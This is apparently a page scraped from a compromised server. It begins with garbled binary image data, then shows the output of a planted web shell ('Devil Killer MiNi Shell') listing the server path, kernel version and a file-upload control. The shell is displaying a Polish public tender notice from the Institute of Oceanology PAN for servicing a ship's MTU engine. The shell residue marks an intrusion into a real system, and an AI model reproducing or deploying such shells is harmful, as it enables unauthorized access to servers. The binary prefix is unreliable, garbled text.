JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220601/0018870201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa przeprowadzenia przeglądu okresowego silnika MTU serii 2000 na s/y Oceania wraz z dostarczeniem części i materiałów niezbędnych do przeprowadzenia przeglądu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">INSTYTUT OCEANOLOGII POLSKIEJ AKADEMII NAUK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000632467</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Powstańców Warszawy 55</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sopot</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">81-712</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">58 551-72-81</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">58 551-21-30</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mmasnicka@iopan.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.iopan.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - Polska Akademia Nauk i tworzone przez nią jednostki organizacyjne</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> badania naukowe, edukacja </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa przeprowadzenia przeglądu okresowego silnika MTU serii 2000 na s/y Oceania wraz z dostarczeniem części i materiałów niezbędnych do przeprowadzenia przeglądu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d8dd4cf2-e18e-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00188702</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00074726/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Przegląd okresowy silnika MTU serii 2000 na s/y „Oceania” wraz z dostarczeniem części i materiałów niezbędnych do przeprowadzenia przeglądu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W przedmiotowym postępowaniu<br/>o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu<br/>miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal (skrzynka ePUAP<br/>Zamawiającego: ePUAP: /IOPAN/SkrytkaESP) oraz poczty elektronicznej.<br/>2. Zamawiający może komunikować się z Wykonawcami za pomocą poczty elektronicznej.<br/>Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami: p. Małgorzata Maśnicka,<br/>email: mmasnicka@iopan.pl, w zastępstwie: p. Agnieszka Animucka,email: aanimucka@iopan.pl.<br/>3. Maksymalny rozmiar plików przesyłanych za pośrednictwem poczty elektronicznej wynosi 30 MB.<br/>4. Wykonawca zamierzający wziąć udział w postępowaniu, musi posiadać konto na ePUAP.<br/>5.Składanie ofert odbywa się przy użyciu miniPortalu: https://miniportal.uzp.gov.pl/.<br/>6.Ofertę wraz z załącznikami należy złożyć za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku<br/>(dostępnego na ePUAP i udostępnionego na miniPortalu).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wykonawca składa ofertę z dokumentami, oświadczeniami za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego na<br/>miniPortalu.<br/>2.Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane są w Regulaminie korzystania z miniPortalu oraz Warunkach korzystania z elektronicznej 3.Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy wynosi<br/>150MB.<br/>4.Za datę przekazania oferty, wniosków, i innych dokumentów, oświadczeń oraz informacji przyjmuje<br/>się datę ich przekazania na ePUAP.<br/>5.Ofertę oraz oświadczenie, o którym mowa w art. 125 ust. 1 Pzp, składa się, pod rygorem<br/>nieważności, w formie elektronicznej (podpisanej kwalifikowanym podpisem elektronicznym) lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. 6. Szczegółowe wymagania wskazane są w rozdziale V i XII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający - Instytut Oceanologii Polskiej Akademii<br/>Nauk informuje, że w zakresie w jakim pozyskuje dane osobowe w związku z prowadzeniem<br/>niniejszego postępowania o udzielenie zamówienia publicznego, w tym w związku z zawarciem umowy<br/>w sprawie zamówienia publicznego, jest administratorem danych osobowych w rozumieniu przepisów<br/>Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE („ogólne rozporządzenie o ochronie<br/>danych” zwane dalej „Rozporządzeniem”) .2. Dane kontaktowe administratora danych osobowych: tel.<br/>(+48 58) 73 11 600, fax: (+48 58) 551 21 30; e-mail: office@iopan.pl.3. W sprawach związanych z<br/>przetwarzaniem danych należy kontaktować się z Inspektorem Ochrony Danych: tel. e-mail:<br/>iodo@iopan.pl.4. Szczegółowe postanowienia w zakresie przetwarzania danych osobowych zawarte<br/>są w Rozdziale XXV SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IO/ZP/4/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa przeprowadzenia przeglądu okresowego silnika MTU serii 2000 na s/y „Oceania” wraz z dostarczeniem części i materiałów niezbędnych do przeprowadzenia przeglądu dla Instytutu Oceanologii Polskiej Akademii Nauk (nr postępowania IO/ZP/4/2022).<br/>2.	Kod CPV: 50241000-6 – Usługi w zakresie napraw i konserwacji statków.<br/>3.	Przedmiot zamówienia składa się z usługi przeglądu okresowego silnika MTU serii 2000 dokonywanego po 30 000 godzinach pracy silnika oraz dostawy materiałów i części potrzebnych do wykonania w/w przeglądu.<br/>4.	Usługa przeglądu powinna zostać wykonana przez serwis posiadający możliwości techniczne do przeprowadzenia przeglądu serwisowego i wymiany podzespołów zalecanych przez producenta silników MTU serii 2000 po 30 000 godzinach pracy silnika (między innymi programy komputerowe do ustawienia parametrów silnika).<br/>5.	Zakres prac dla przebiegu 30 000 motogodzin silnika MTU serii 2000:<br/>1)	przeprowadzenie serwisu przeglądowego;<br/>2)	wymiana podzespołów:<br/>a)	rurka wysokiego ciśnienia – 12 szt.,<br/>b)	wtryskiwacz – 12 szt.,<br/>c)	kołek rozprężny (spring pin) – 2 szt.,<br/>d)	filtr paliwa – 2 szt.,<br/>e)	filtr oleju – 2 szt.,<br/>f)	termostat – 1 szt.,<br/>g)	termostat – 2 szt.,<br/>h)	pasek alternatora – 1 szt.,<br/>i)	pierścień uszczelniający – 12 szt.,<br/>j)	pierścień uszczelniający – 12 szt.,<br/>k)	filtr powietrza – 2 szt.,<br/>l)	element tłumiący – 12 szt.,<br/>m)	uszczelka pokrywy zaworów – 12 szt.,<br/>n)	uszczelka głowicy – 12 szt.,<br/>o)	pompa wtryskowa – 12 szt.,<br/>p)	głowica cylindra (cylinder head) – 12 szt.,<br/>q)	wkład separatora oleju – 1 szt.,<br/>r)	wkład filtra paliwa – 2 szt.;<br/>3)	wymiana wszystkich uszczelek, wszystkich odkręcanych śrub, oringów, pierścieni uszczelniających, uszczelnień głowic, podkładek;<br/>4)	próbne uruchomienie silnika przy nabrzeżu,<br/>5)	komputerowa diagnostyka silnika w ruchu przy użyciu dedykowanych programów, <br/>6)	przekazanie dokumentacji powykonawczej,<br/>7)	inne czynności wymagane przez producenta silnika do prawidłowego wykonania przeglądu silnika po 30 000 godzinach pracy silnika.<br/>6.	Wykonawca zobowiązany jest w cenie oferty uwzględnić wszystkie niezbędne czynności związane z wyżej wymienionym zakresem przeglądu.<br/>7.	Usługa powinna być wykonana przy użyciu materiałów i części najwyższej jakości, odpowiednich do modelu i typu silnika.<br/>8.	Wykonawca zapewni uruchomienie urządzeń oraz przeprowadzi próby ich działania z udziałem przedstawiciela Zamawiającego, a także dokona ewentualnej regulacji (w razie potrzeby).<br/>9.	Wykonawca ponosi odpowiedzialność za właściwe wykonanie prac przeglądowych silnika statku s/y „Oceania”, zapewnienie warunków bezpieczeństwa przy ich wykonywaniu oraz za metody organizacyjno-techniczne stosowane podczas tych prac.<br/>10.	Wykonawca przy wykonywaniu prac przeglądowych jest zobowiązany we własnym zakresie i na własny koszt do:<br/>-	utrzymywania należytego porządku w miejscu dokonywania przeglądu silnika (miejsce wykonywania prac powinno być czyste i uporządkowane, bez pozostawania materiałów i sprzętu zbędnych do prowadzenia prac, a także odpadów);<br/>-	przestrzegania wykonywania prac zgodnie z obowiązującymi przepisami prawa ochrony środowiska;<br/>-	wykonywania w czasie realizacji prac wszystkich niezbędnych sprawdzeń, pomiarów i badań, które powinny być przeprowadzone zgodnie z wytycznymi zawartymi w Dokumentacji Techniczno-Ruchowej producenta silnika MTU, przypadających na przegląd przy przebiegu 30 000 motogodzin; <br/>-	zagospodarowania wszystkich odpadów powstałych podczas przeglądu silnika (m.in. zużyte oleje i smary, pozostałości po wykonywanych pracach), które przechodzą na własność Wykonawcy, i który zobowiązany jest usunąć je ze statku, a następnie zagospodarować zgodnie z przepisami ustawy o odpadach, oraz przekazania Zamawiającemu kopii kart przekazania odpadów;<br/>-	doprowadzenia po zakończeniu prac do należytego stanu i porządku miejsca wykonywania przeglądu i przekazania go Zamawiającemu w terminie odbioru końcowego.<br/>11.	Wykonawca zobowiązany jest do dostarczenia wszystkich części i materiałów niezbędnych do przeprowadzenia przeglądu w ramach zaoferowanej przez siebie ceny.<br/>12.	Wykonawca zobowiązany jest spowodować, aby przewidziane do użycia w ramach niniejszego zamówienia materiały i części były nowe, dopuszczone do obrotu i powszechnego i jednostkowego stosowania oraz najwyższej dostępnej na rynku jakości. Zamawiający nie dopuszcza użycia materiałów lub części używanych lub po regeneracji.<br/>13.	Wykonawca zobowiązany jest udzielić Zamawiającemu gwarancji na wykonane prace na okres zaoferowany w ofercie, nie krótszy jednak niż 12 miesięcy, licząc od dnia podpisania końcowego protokołu odbioru bez zastrzeżeń. Na zamontowane części i urządzenia – gwarancja nie krótsza niż według wskazań producentów. Wykonawca przedstawi Zamawiającemu poszczególne gwarancje producentów.<br/>14.	Wykonawca powinien wykonać przegląd zgodnie z dokumentacją remontową remontu głównego silników MTU serii 2000.<br/>15.	Usługa winna być wykonana na statku w miejscu jego postoju – port Gdańsk, nabrzeże zbożowe, ul. Starowiślna 1.<br/>16.	Ze względu na harmonogram rejsowy statku wykonanie usługi musi odbyć się w terminie od 15.09.2022 r. do 22.09.2022r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50241000-6 - Usługi w zakresie napraw i konserwacji statków</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-15 do 2022-09-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert został opisany w Rozdziale XIX SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności wynagrodzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym – Zamawiający nie precyzuje tego warunku;<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie precyzuje tego warunku;<br/>3)	sytuacji ekonomicznej lub finansowej – Zamawiający nie precyzuje tego warunku;<br/>4)	zdolności technicznej lub zawodowej – w zakresie:<br/>posiadania doświadczenia w postaci należytego wykonania, a w przypadku świadczeń okresowych lub ciągłych również wykonywania w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – to w tym okresie co najmniej dwóch usług odpowiadających przedmiotowi zamówienia, to jest obejmujących przegląd lub remont silnika statku o mocy minimum 500 KW, o wartości minimum 100 000 zł brutto każda.<br/>Uwaga!<br/>W przypadku, gdy zapłata za usługę następowała w walucie innej niż złoty polski, wartość zamówienia należy przeliczyć na złote polskie według średniego kursu danej waluty ogłaszanego przez Narodowy Bank Polski z dnia wszczęcia niniejszego postępowania (1 czerwca 2022 r.).<br/>3.	W przypadku wspólnego ubiegania się o realizację zamówienia, Zamawiający wymaga, aby co najmniej jeden Wykonawca posiadał doświadczenie, o którym mowa w ust. 2 pkt 4) w pełnym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę lub ofertę częściową (sporządzone zgodnie ze wzorem stanowiącym Załącznik nr 4.1 do SWZ); albo oświadczenie o przynależności do tej samej grupy kapitałowej (sporządzone zgodnie ze wzorem stanowiącym Załącznik nr 4.2 do SWZ) wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej;<br/>2)	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzone nie wcześniej niż 3 miesiące przed ich złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane (sporządzony zgodnie ze wzorem stanowiącym Załącznik nr 3 do SWZ), oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	wypełniony Formularz ofertowy – przygotowany zgodnie z wzorem stanowiącym Załącznik nr 1 do SWZ;<br/>3)	odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru - w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania; <br/>4)	pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy - jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w ust. 1 pkt 3 powyżej; <br/>5)	w przypadku wspólnego ubiegania się o realizację zamówienia – pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego;<br/>6)	w przypadku wspólnego ubiegania się o realizację zamówienia – oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp, z którego wynika które usługi wykonają poszczególni Wykonawcy;<br/>7)	w przypadku polegania na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotu trzeciego – zobowiązanie podmiotu trzeciego lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, o którym mowa w art. 118 ust. 3 ustawy Pzp;<br/>8)	w przypadku polegania na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotu trzeciego – oświadczenie podmiotu udostępniającego zasoby potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby, o którym mowa w art. 125 ust. 5 ustawy Pzp – sporządzone zgodnie ze wzorem stanowiącym Załącznik nr 2.2 do SWZ;<br/>9)	informację, że wybór oferty Wykonawcy będzie prowadził do powstania u Zamawiającego obowiązku podatkowego, w sytuacji, o której mowa w art. 225 ustawy Pzp. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 